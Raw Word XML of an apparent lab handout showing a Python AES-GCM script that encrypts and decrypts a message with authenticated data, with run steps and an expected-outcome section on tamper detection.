    <w:p w14:paraId="49723876" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="840" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Encrypt the message print("Encrypting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message...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECF4A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/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aad = b"Additional Authenticated Data"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 Optional AAD ciphertext,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nonce,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tag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encrypt_message(key,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message,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aad)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671EF06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EBA2E8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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Print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encrypted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details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D55D12" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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print(f"Ciphertext (Base64): {base64.b64encode(ciphertext).decode()}") print(f"Nonce (Base64): {base64.b64encode(nonce).decode()}") print(f"Authentication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Tag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(Base64):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{base64.b64encode(tag).decode()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49605D9F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="840" w:right="5229"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Decrypt the message print("\nDecrypting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message...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F46DB0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decrypted_message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decrypt_message(key,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ciphertext,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nonce,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tag,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pacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aad)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20B303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5D8024CC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decrypted_message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1810947B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="3057" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"Decrypted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Message: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{decrypted_message}") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CFB83" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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print("Failed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message.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9BFB6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136C6AE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="6526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 xml:space="preserve"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E0C31" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="195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4: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Running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3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A367955" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D9A14C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="279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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aes_gcm_encryption.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260DBE46" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="843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saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784938DA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2C16F098" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0718B231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aes_gcm_encryption.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5978B367" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068759B4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188F55B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:before="3"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Encrypt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AES-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>GCM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3968EB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing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Print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ciphertext,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nonce,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tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7AD671" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:line="269" w:lineRule="exact"/>
        <w:ind w:left="1799" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Decrypt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verify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spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02816314" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C2A852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Step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5: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Verifying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</w:rPr>
        <w:t>the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Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC01228" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49855422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script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print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ciphertext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Base64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format),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nonce,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4"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF980C2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ind w:right="402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decrypted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same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key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nonce.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decryption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successful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message has not been tampered with, the original plaintext message will be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD553C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before="1"/>
        <w:ind w:right="1211"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>If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altered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tag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match,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 decryption will fail, and an error message will be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BD8EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1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FFD44C7" wp14:editId="72446A52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295932</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="20955"/>
                <wp:effectExtent l="0" t="0" r="0" b="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955"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6173470" cy="2095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1704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015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1704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" y="17779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6FC74" id="Group 136" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.3pt;width:486.1pt;height:1.65pt;z-index:-15717888;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="617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&#10;">
                <v:shape id="Graphic 137" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:196;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6172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nPgwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/Q/LFHrTTS00NrqK2Jb26At6HbNjEpudTbPbmOTXu4LgbT6+58wWrSlFQ7UrLCt4HkUgiFOr&#10;C84U7HefwwkI55E1lpZJQUcOFvOHwQwTbc+8oWbrMxFC2CWoIPe+SqR0aU4G3chWxIE72tqgD7DO&#10;pK7xHMJNKcdR9CoNFhwacqxolVP6u/03Cg57/f63fhvHOuuOPx9fp54O1Cv19NgupyA8tf4uvrm/&#10;dZj/EsP1mXCBnF8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAfkZz4MMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 138" o:spid="_x0000_s1028" style="position:absolute;left:61704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6hTxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PSwMx&#10;EMXvgt8hjODNZltB6tq0tBXBSy2ueh82Y3ZxM1mS7J9+e+cgeJvhvXnvN5vd7Ds1UkxtYAPLRQGK&#10;uA62ZWfg8+Plbg0qZWSLXWAycKEEu+311QZLGyZ+p7HKTkkIpxINNDn3pdapbshjWoSeWLTvED1m&#10;WaPTNuIk4b7Tq6J40B5bloYGezo2VP9UgzegT+vHw+V8HHpXnd6e4zB9nUdnzO3NvH8ClWnO/+a/&#10;61cr+PdCK8/IBHr7CwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPhbqFPEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 139" o:spid="_x0000_s1029" style="position:absolute;left:3;top:10;width:61734;height:171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SPwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hBG+aVcHq1igqCHpoS7Us9DZsppvFzWRJom7/fVMQepvH+5zlurONuJEPtWMF41EGgrh0&#10;uuZKwed5P5yDCBFZY+OYFPxQgPWq97TEXLs7f9DtFCuRQjjkqMDE2OZShtKQxTByLXHivp23GBP0&#10;ldQe7yncNnKSZTNpsebUYLClnaHycrpaBYX3ZvP+9rql47T9qp+zYrENhVKDfrd5ARGpi//ih/ug&#10;0/zpAv6eSRfI1S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAIWXkj8MAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3048,3048l,3048,,16764r3048,l3048,3048xem6173152,r-3035,l6170117,3048r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 140" o:spid="_x0000_s1030" style="position:absolute;left:61704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3ExAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8Mw&#10;DIXvg/0Ho8EuY3U2Silp3TI2BjuEQJuys4jVODSWg+212b+vDoXeJN7Te5/W28kP6kwx9YENvM0K&#10;UMRtsD13Bg7N9+sSVMrIFofAZOCfEmw3jw9rLG248I7O+9wpCeFUogGX81hqnVpHHtMsjMSiHUP0&#10;mGWNnbYRLxLuB/1eFAvtsWdpcDjSp6P2tP/zBl64rmrXNyf/1fw2RaxSPejKmOen6WMFKtOU7+bb&#10;9Y8V/LngyzMygd5cAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGzMjcTEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3047,l,,,13715r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 141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uzwAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L/ocwgjdNFRXpGmUVBHFPW714m21m22ozKUm09d+bhQVv83ifs9p0phYPcr6yrGAyTkAQ51ZX&#10;XCg4n/ajJQgfkDXWlknBkzxs1v3eClNtW/6mRxYKEUPYp6igDKFJpfR5SQb92DbEkfu1zmCI0BVS&#10;O2xjuKnlNEkW0mDFsaHEhnYl5bfsbhSQzTFL2uPXj73ub5drNndbPVdqOOg+P0AE6sJb/O8+6Dh/&#10;NoG/Z+IFcv0CAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA3O57s8AAAADcAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 142" o:spid="_x0000_s1032" style="position:absolute;left:3;top:177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8roxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvBf/DMkIvpW4agi3RVYolUOhFraUeh+yYBLOzS3Y1yb/vFgRvM7z3vnmzXA+mFVfqfGNZwcss&#10;AUFcWt1wpeDwXTy/gfABWWNrmRSM5GG9mjwsMde25x1d96ESEcI+RwV1CC6X0pc1GfQz64ijdrKd&#10;wRDXrpK6wz7CTSvTJJlLgw3HCzU62tRUnvcXEylzt2lM+uMuh222/R2Lr6eP46tSj9PhfQEi0BDu&#10;5lv6U8f6WQr/z8QJ5OoPAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEACWvK6MYAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==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CDFF4C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C7E279" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>Expected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4809F6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="59"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B2D937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script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successfully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encrypt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decrypt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AES-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>GCM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243EB52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ciphertext,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nonce,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authentication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tag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printed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Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7888C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spacing w:before="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decrypted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match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original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plaintext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tampering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occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E41F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr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If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tag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altered,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decryption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fail,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indicating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tampering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4A7A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000"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5AFB86F" wp14:editId="014362DA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295999</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="21590"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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1590"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6173470" cy="2159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12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6172200" y="20307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170421" y="14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1485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170421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" y="18249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85D4C" id="Group 143" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.3pt;width:486.1pt;height:1.7pt;z-index:-15717376;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="617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s6VwQAAI4YAAAOAAAAZHJzL2Uyb0RvYy54bWzsWW2PmzgQ/n5S/wPiezdA3jZos1XVdlcn&#10;Vb1K3dN9dsAEVMCc7YTsv7+xzYADSbrJ9brSKYoUm3jwvPh5ZgZy925X5M6WcpGxcun6N57r0DJi&#10;cVaul+6fTw9vb11HSFLGJGclXbrPVLjv7t/8dldXIQ1YyvKYcgc2KUVYV0s3lbIKRyMRpbQg4oZV&#10;tITFhPGCSLjk61HMSQ27F/ko8LzZqGY8rjiLqBDw60ez6N7r/ZOERvKPJBFUOvnSBduk/ub6e6W+&#10;R/d3JFxzUqVZ1JhBLrCiIFkJStutPhJJnA3PBlsVWcSZYIm8iVgxYkmSRVT7AN74Xs+bR842lfZl&#10;Hdbrqg0ThLYXp4u3jb5sH3n1rfrKjfUw/cyi7wLiMqqrdWivq+t1J7xLeKFuAiecnY7ocxtRupNO&#10;BD/O/Pl4MofAR7AW+NNFE/EohWMZ3BWln07eNyKhUapNa02pK8CO6MIj/l14vqWkojrqQrn/lTtZ&#10;DNCeTFynJAVg+LGBi/oJ4qTUg5yKYXMlmnAejJAfGNBZIQoAyU2IvHGgQ9S6SsJoI+QjZTrWZPtZ&#10;SIPZGGckxVm0K3HKAfkK87nGvHQdwDx3HcD8yqiviFT3qQNUU6fWh2UsSeGstCFqtWBb+sS0nFQn&#10;BkdqpPC0wdROJi9tWfDKksI1HCu9n5EBfd5cWQa74TqORs7We540BhT3i3ImqFGlXNc623CAfjvg&#10;guVZ/JDluQqA4OvVh5w7WwKRXTyoT2OyJQbYFKFBgJqtWPwMEKoBM0tX/L0hnLpO/nsJIAXPJU44&#10;TlY44TL/wHTW0rHnQj7t/iK8ciqYLl0J+PnCEKskRGSA/UrAyKo7S/Z+I1mSKdho24xFzQXwxiD4&#10;FxBoOiTQVMXvxQQCCHiTwNe